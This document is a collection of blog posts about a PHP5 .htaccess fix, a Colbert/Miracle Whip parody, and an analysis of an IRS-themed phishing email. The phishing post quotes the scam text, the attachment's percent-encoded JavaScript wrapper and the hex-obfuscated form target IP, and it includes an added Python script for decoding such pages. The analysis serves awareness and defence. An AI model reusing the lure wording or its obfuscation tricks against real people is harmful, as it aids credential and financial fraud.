WordPress 500 Server Errors solved with PHP 5

Was having trouble with 500 Internal Server Errors when uploading files larger than ~1MB and an inability to automatically upgrade WordPress.  Did a lot of hunting around and none of the conventional solutions (increase limits in php.ini file, etc) seemed to apply.  On a whim, I upgraded my hosting package to PHP5 and things magically started working.  If you’re having this issue, hopefully this will work for you, too.

Also, for PHP5, my host (1and1) just requires that all php files end in .php5.  Easy to accomplish in your .htaccess file, just add:

AddType x-mapp-php5 .php
AddHandler x-mapp-php5 .php

Best of luck!

Inside the Spam Folder: A Letter from the “IRS”

Every once in a while, a spin around the old spam folder can be interesting just to see what trickery the spammers are up to lately.  You never know what the Nigerian Prince has up his sleeve.  In a recent foray, I found an entertaining e-mail from the “IRS”.  I knew it was going to be first-rate when I saw the exclamation point in the subject line:

From: Internal Revenue Service [mailto:suvery123@irs.org]
Sent: Monday, October 26, 2009 10:56 AM
Subject: United States Department of the Treasury !

Internal Revenue Service (IRS)
United States Department of the Treasury

Dear Taxpayer,

After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $773.80. Please submit the tax refund request and allow us 6-9 days in order to process it.

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline. To access your tax refund, use the form attached to this email.

Regards,
Internal Revenue Service

First, I have to congratulate the “IRS” for figuring out my e-mail address and connecting it with my tax records. Then there’s the fact that my check will be here within 9 days,  that’s fast!  Unless, of course, it’s delayed and I never hear from them again.  Hopefully my bank account doesn’t slowly empty while I wait.

Once you get beyond the questionable e-mail, though, things actually get a little scary.  Attached to the e-mail was an .html file that I was supposed to fill out.  Curious how it worked (but not wanting to open the page in a browser), I opened up the source in my favorite text editor.  The entire page code was eerily simple:

<Script Language='Javascript'>
<!-- HTML Encryption provided by Internal Revenue Service -->
<!--
document.write(unescape('[50 KB of percent encoded numbers]'));
//-->
</Script>'

The actual content the page writes to the DOM is percent-encoded (as is used in URLs), making it hard to see what’s going on without rendering it in a browser.  Using a nifty decoding tool, I unpacked the HTML.  All of the CSS and image resources were linked directly off of the IRS.gov website, making the source and the page look awfully authentic.  The only sign of another party being involved was in the site the form was set to submit to.  Again, the spammer used some encoding to mask their identity.  The form went to http://0x3F.0xDCC619/, which resolves to https://63.220.198.25/.  Very crafty people who are definitely not planning to send me a tax refund anytime soon.
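The same triage can be done statically, without a browser or an online decoder. The following is an added example, not part of the original post: it pulls the `unescape()` payload out of an attachment, decodes it, and rewrites hex, octal, or short-form IPv4 hosts in form targets as dotted decimal. The sample attachment and the function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed sample in the shape of the attachment described above: a tiny
# made-up payload whose form posts to 192.0.2.1 (documentation range) in hex.
SAMPLE = (
    "<Script Language='Javascript'>\n<!--\n"
    "document.write(unescape('%3Cform%20method%3D%22post%22%20action%3D%22"
    "http%3A//0xC0.0x000201/%22%3E%3Cinput%20name%3D%22pin%22%3E%3C/form%3E'));\n"
    "//-->\n</Script>"
)
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
PART_RE = re.compile(r"0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*", re.I)

def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX code units, then %XX as Latin-1."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

class FormActions(HTMLParser):
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")

def normalize_ipv4(host):
    """Dotted-decimal for inet_aton-style hosts (hex, octal, 1-4 parts), else None."""
    parts = host.split(".")
    if len(parts) > 4 or not all(PART_RE.fullmatch(p) for p in parts):
        return None
    nums = [int(p, 16 if p[:2].lower() == "0x" else 8 if p[0] == "0" else 10) for p in parts]
    *head, last = nums
    if any(n > 0xFF for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = last + sum(n << (8 * (3 - i)) for i, n in enumerate(head))
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def triage(html):
    """Decode each unescape() payload without rendering it; list form targets."""
    findings = []
    for _, payload in UNESCAPE_RE.findall(html):
        parser = FormActions()
        parser.actions = []  # collected <form action=...> values
        parser.feed(js_unescape(payload))
        for action in parser.actions:
            host = urlsplit(action).hostname or ""
            findings.append((action, host, normalize_ipv4(host)))
    return findings
```

A non-None third field for a host that was not written in plain dotted decimal is a strong signal that the form target was deliberately obscured.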

Turns out that the IP is owned by Beyond The Network America, a shady spam organization.  A quick web search shows their involvement in vanilla spam, phishing attacks, like the one I got, and various other types of Internet chicanery.  BTNA even has the dubious distinction of being banned from Wikipedia since March of 2007 (#87!).  But their spam machine rolls on.

So that was my latest foray into the Spam folder.  I found out that my spam was linked to a large spam-sending organization, and that said organization is pretty good at making their fake pages appear authentic.  Despite their efforts, though, there were quite a few warning signs that something was amiss, starting with the e-mail itself and ending with the form they wanted me to fill out.  A friendly reminder to anyone out there who may be tempted by $800: even if the IRS were looking to contact you about a surprise refund (as if), they would not be e-mailing to ask for your ATM card’s PIN number.  Every time someone does ask for that, you can just forward them on their merry way to the FTC’s CAN-SPAM people.

[Image: the fake IRS page, styled with real IRS resources]

“The Mayolution will Not be Televised” – Colbert responds on behalf of mayonnaise everywhere

Late last week the Colbert Report showed a pitch-perfect parody of Miracle Whip’s new campaign.  Though Colbert lightheartedly attacks the campaign, the brand comes out ahead.  Miracle Whip was thrilled about their “special appearance” the next morning on Facebook.

And rightfully so.  The campaign didn’t just warrant a mention, but Colbert included a full thirty-second spot in the program.  Nobody’s ever watched a Miracle Whip commercial so intently.  Not to mention that appearing on Colbert grants the Colbert bump, just the kind of credibility Miracle Whip was looking for in the target (which Colbert identifies as 18-34 year old males in his spoof).  Nearly a perfect placement.  The only thing left to wonder is if Kraft paid for that kind of exposure…

Either way, it’s funny television.  Enjoy: